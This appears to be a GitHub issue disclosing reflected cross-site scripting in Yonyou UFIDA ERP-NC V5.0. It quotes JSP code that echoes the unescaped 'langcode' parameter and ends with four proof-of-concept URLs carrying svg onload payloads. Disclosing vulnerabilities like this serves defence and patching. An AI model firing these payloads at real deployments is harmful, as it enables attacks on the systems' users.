Skip to content

Yonyou UFIDA ERP-NC V5.0 /help/systop.jsp and /help/top.jsp Reflected Cross-Site Scripting (XSS) #86

New issue
New issue
Open
Open
Yonyou UFIDA ERP-NC V5.0 /help/systop.jsp and /help/top.jsp Reflected Cross-Site Scripting (XSS)#86
@Hebing123

Description

@Hebing123
Hebing123
opened on Mar 10, 2025

Summary

This report details the discovery of two Reflected Cross-Site Scripting (XSS) vulnerabilities in Yonyou UFIDA ERP-NC V5.0. These vulnerabilities exist in the /help/systop.jsp and /help/top.jsp components of the application. The vulnerabilities allow an attacker to inject malicious JavaScript code into the application, which is then executed in the context of the victim's browser.

Details

/help/systop.jsp

<%String sLangcode = request.getParameter("langcode");%>
···
<SCRIPT language=JavaScript type=text/JavaScript>
  function onclickSearch(){
  	var term = document.frm1.term.value;
  	if (term!="")
		window.parent.frames['helpfr2'].window.location.href = "Search.jsp?langcode=<%=sLangcode%>&term=" + term;
  }
</SCRIPT>
···
<DIV style="filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src=image/logo_<%=sLangcode%>.png);width:208px;height:47px">

The langcode parameter in /help/systop.jsp is directly used in the HTML output without proper sanitization or encoding. This allows an attacker to inject arbitrary JavaScript code, which is executed when the page is rendered.

/help/top.jsp

<%String sLangcode = request.getParameter("langcode");%>
···
<TD width="50" align=right> <font size="2"><%=nc.bs.ml.NCLangResOnserver.getInstance().getString(sLangcode,"smcomm","","search_find")%></font> 
···
<TD width="80" align=right><font size="2"><%=nc.bs.ml.NCLangResOnserver.getInstance().getString(sLangcode,"smcomm","","displaydir")%></font></TD>
···
<a href="/menu.jsp?datasource=<%=sDatasource%>&langcode=<%=sLangcode%>" target="helpfr2">
···
<DIV style="filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src=image/logo_<%=sLangcode%>.png);width:208px;height:47px">

Similar to the first vulnerability, the langcode parameter in /help/top.jsp is also directly used in the HTML output without proper sanitization or encoding. This allows an attacker to inject arbitrary JavaScript code, which is executed when the page is rendered.

POC

http://target-ip/help/top.jsp?langcode=1%22%3E%3Csvg%20onload=alert(1)%3E
http://target-ip/help/top.jsp?langcode=1%22%3E%3C/script%3E%3Csvg%20onload=alert(1)%3E
http://target-ip/help/systop.jsp?langcode=1%22%3E%3Csvg%20onload=alert(1)%3E
http://target-ip/help/systop.jsp?langcode=1%22%3E%3C/script%3E%3Csvg%20onload=alert(1)%3E

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions